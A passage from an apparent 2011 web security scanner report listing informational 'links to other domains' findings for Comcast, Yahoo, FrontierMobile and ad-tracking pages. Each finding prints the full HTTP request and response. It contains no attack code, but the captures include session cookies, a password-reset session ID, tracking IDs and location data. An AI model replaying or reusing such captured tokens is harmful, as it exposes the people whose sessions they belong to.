<p style="margin:0em 0em 1em 0em;">(4) Barron's, March 15, 2010, 15th annual survey, <a href="http://online.barrons.com/article/SB126844973242861545.html?mod=BOL_hpp_emc#articleTabs_panel_article%3D1" target="_blank">"Newest Trading Play: Screen Savings"</a>
...[SNIP]...
</strong> OptionsHouse provides neither investment nor tax advice. Refer to <a href="http://www.optionsclearing.com/about/publications/character-risks.jsp" target="_blank" title="Characteristics and Risks of Standardized Options">Characteristics and Risks of Standardized Options</a>
...[SNIP]...
<br>
   .. 2006-2011 OptionsHouse, LLC All rights reserved. Member of <a href="http://www.finra.org" target="_blank" title="FINRA">FINRA</a>, <a href="http://www.sipc.org" target="_blank" title="SIPC">SIPC</a>
...[SNIP]...

15.75. https://login.comcast.net/myaccount/lookup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/lookup

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:26 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=322
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 12359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
   
   
   <title>Forgot your Comcast ID?</title>
   <link rel="stylesheet" type="text/css" href=
...[SNIP]...
<!-- Load jQuery from Google's CDN -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Lc6JwEAAAAAAAMsonray6oG09balZGZ2IONzjBx"></script>
<noscript>
   <iframe src="https://www.google.com/recaptcha/api/noscript?k=6Lc6JwEAAAAAAAMsonray6oG09balZGZ2IONzjBx" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...
</p>
<a href="https://www.comcastsupport.com/chatentry/Default.aspx#AccountBilling.AccountNumber|form" class="button" title="Start Chat" target="_blank" onclick="return idm.trackLink(this, 'uid lookup - Account Validation (step 1)- chat button')">Start Chat</a>
...[SNIP]...
</p>
<a href="https://www.comcastsupport.com/chatentry/Default.aspx#AccountBilling.SSNFailed|form" class="button" title="Start Chat" target="_blank" onclick="return idm.trackLink(this, 'uid lookup - SSN Validation (step 1)- chat button')">Start Chat</a>
...[SNIP]...

15.76. https://login.frontiermobile.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontiermobile.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?sae_nexthop_template=freetrial HTTP/1.1
Host: login.frontiermobile.com
Connection: keep-alive
Referer: https://www.frontiermobile.com/data/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:38 GMT
Server: Apache/2.2.16 (Debian)
Expires: -1
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 16142
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>FrontierMobile :
...[SNIP]...
<noscript>
<a href="https://www.FrontierAdServing.com/a.aspx?ZoneID=16&amp;Task=Click&amp;Mode=HTML&amp;SiteID=4&amp;Secure=True&amp;PageID=14133"
target="_blank">

<img alt="" border="0" height="600" src="https://www.FrontierAdServing.com/a.aspx?ZoneID=16&amp;Task=Get&amp;Mode=HTML&amp;SiteID=4&amp;Secure=True&amp;PageID=14133"
width="120">
</a>
...[SNIP]...
<noscript>

<a href="https://www.FrontierAdServing.com/a.aspx?ZoneID=15&amp;Task=Click&amp;Mode=HTML&amp;SiteID=4&amp;PageID=78292" target="_blank">

<img src="https://www.FrontierAdServing.com/a.aspx?ZoneID=15&amp;Task=Get&amp;Mode=HTML&amp;SiteID=4&amp;PageID=78292" width="728" height="90" border="0" alt="" /></a>
...[SNIP]...

15.77. https://login.yahoo.com/config/login_verify2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css">
<style type="text/css">
...[SNIP]...
<!-- intl = us, spaceid = 150002530 offset = 0 position = HEAD -->
<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
02530:HEAD/Y=YAHOO/EXP=1315320523/L=3n0ry0KjqbrpARpjTl.wjQBVMhd7ak5mFqsACpMR/B=IBDBQmKJiTw-/J=1315313323743766/K=ObIk..7cmlZ5M2Lo3Buz0g/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128vl4vjr(gid$3n0ry0KjqbrpARpjTl.wjQBVMhd7ak5mFqsACpMR,st$1315313323695668,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.78. http://maps.yahoo.com/darla_fc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /darla_fc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /darla_fc?cb=YAHOO.ads.darla._loaded&p=maps&f=2022332404&l=LREC&en=utf-8&rn=1315331124066&em=%7B%22site-attribute%22%3A%22content%3Dno_expandable%3Bajax_cert_expandable%22%2C%22ad-logoption%22%3A%22NOPAGEVIEW%22%7D&t_e=1&.intl=us HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7583

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<div id=LREC><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=az1wfGKIKoRUS8eSTmYV9iI5Mhd7ak5mFfcAAjI2&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313143194447&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p1sh2al/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320343/L=az1wfGKIKoRUS8eSTmYV9iI5Mhd7ak5mFfcAAjI2/B=Rb06QUoGYvk-/J=1315313143194447/K=wHyM5LSmYryrbUH9q6WaMQ/A=6261227/R=0/*"></IFRAME>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128uvl23o(gid$az1wfGKIKoRUS8eSTmYV9iI5Mhd7ak5mFfcAAjI2,st$1315313143158494,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.79. http://maps.yahoo.com/darla_fc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /darla_fc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /darla_fc?cb=YAHOO.ads.darla._loaded&p=maps&f=2022332404&l=LREC&en=utf-8&rn=1315331355624&em=%7B%22site-attribute%22%3A%22content%3Dno_expandable%3Bajax_cert_expandable%22%2C%22ad-logoption%22%3A%22NOPAGEVIEW%22%7D&t_e=1&.intl=us HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7583

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<div id=LREC><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=FAzBpWKIKoTpARpjTl.wjQ3ZMhd7ak5mFssADGvW&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313355871397&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p7umfii/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320555/L=FAzBpWKIKoTpARpjTl.wjQ3ZMhd7ak5mFssADGvW/B=55j9KkoGYzQ-/J=1315313355871397/K=wAUe6WLorFCi06uKuG03Mw/A=6261227/R=0/*"></IFRAME>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128cr3pli(gid$FAzBpWKIKoTpARpjTl.wjQ3ZMhd7ak5mFssADGvW,st$1315313355829916,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.80. http://maps.yahoo.com/pvproxy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /pvproxy

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pvproxy?r=0.10187717201188207&l=Data.changezoom HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:29 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: keep-alive, close
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 4141

<!-- SpaceID=2023723506 loc=Z noad -->
<script language=javascript>
if(window.yzq_d==null)window.yzq_d=new Object();
window.yzq_d['H9vHQkPDhFU-']='&U=129bsdqd2%2fN%3dH9vHQkPDhFU-%2fC%3d-1%2fD%3dZ%2fB%
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ijja8f(gid$qdx1lGKIKoTpARpjTl.wjQxpMhd7ak5mFtkAABG6,st$1315313369054391,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.81. http://new.music.yahoo.com/recommendedHP/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /recommendedHP/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /recommendedHP/?type=0&results=6&ts=1315331139646 HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 4640


<div id="ymusicRecommendHp" class="ymusic-mod ymusic-mod-tab">
<div class="ymusic-mod-head">
<h2><a href="/recommended/;_ylt=Agd6h7luOXfMzgL1Te03aRSsvyUv" >Recommended</a></h2>

<ul id="y
...[SNIP]...
<a href="Burning-Spear/videos/view/Burning-Reggae--2139897;_ylt=AtKeNbVIhv7F9PBJ86Gt8V.svyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139897;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="Burning-Spear/videos/view/Subject-In-School--2139896;_ylt=An6dTq_EOIRr_N9QDBuwo4msvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139896;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="Burning-Spear/videos/view/Not-Stupid--2139899;_ylt=Atue.tTMDFdVD8FxoymaojasvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139899;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="Burning-Spear/videos/view/Mi-Gi-Dem--2139898;_ylt=ArKNOGkC6BzRtdH0876f_iusvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2139898;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="UB40/videos/view/Sing-Our-Own-Song--2148569;_ylt=AozEBT6vFOeN6StBgMRBpn.svyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2148569;encoding=jpg;size=146x88"><span>
...[SNIP]...
<a href="UB40/videos/view/Don't-Break-My-Heart--2148568;_ylt=Ake6Y6iEqkxkkl274lQ1NVusvyUv" class="ymusic-img-link ymusic-img-play-overlay"><img src="http://d.yimg.com/ec/image/v1/video/2148568;encoding=jpg;size=146x88"><span>
...[SNIP]...

15.82. http://omg.yahoo.com/xhr/ad/LREC/2115806991  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 4999

<html><body><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT&ad_type=iframe&ad_size=300x250&site=148950&section_code=14445112&cb=1315313202464541&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rl4ferg/M=787833.14445112.14291879.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1315320402/L=mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT/B=EE4oQ9BDRvY-/J=1315313202464541/K=kbp5aQiA4RbwMhDPKbyZmw/A=6261235/R=0/*"></IFRAME>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128gso9ed(gid$mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT,st$1315313202419540,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.83. http://pixel.everesttech.net/2565/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
Content-Length: 364
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&amp;utm_medium=paid-banner-ads&amp;utm_campaign=120x60-QuotesBttn&amp;utm_content=stock:oldGrnBlk">here</a>
...[SNIP]...

15.84. http://pro.tweetmeme.com/button.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.tweetmeme.com
Path:   /button.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /button.js?url=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&style=compact&service=bit.ly&t_sec=mit_share&t_act=retweet HTTP/1.1
Host: pro.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 06 Sep 2011 12:49:45 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Url-Lookup: OrAdd (156)
X-Pro-Served-In: 0.0025007724761963
X-Served-By: h00
Content-Length: 6589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <meta content="tex
...[SNIP]...
</style>

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/3.1.1/build/yui/yui-min.js&amp;ult/ylc_1.9.js"></script>
...[SNIP]...

15.85. http://realestate.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

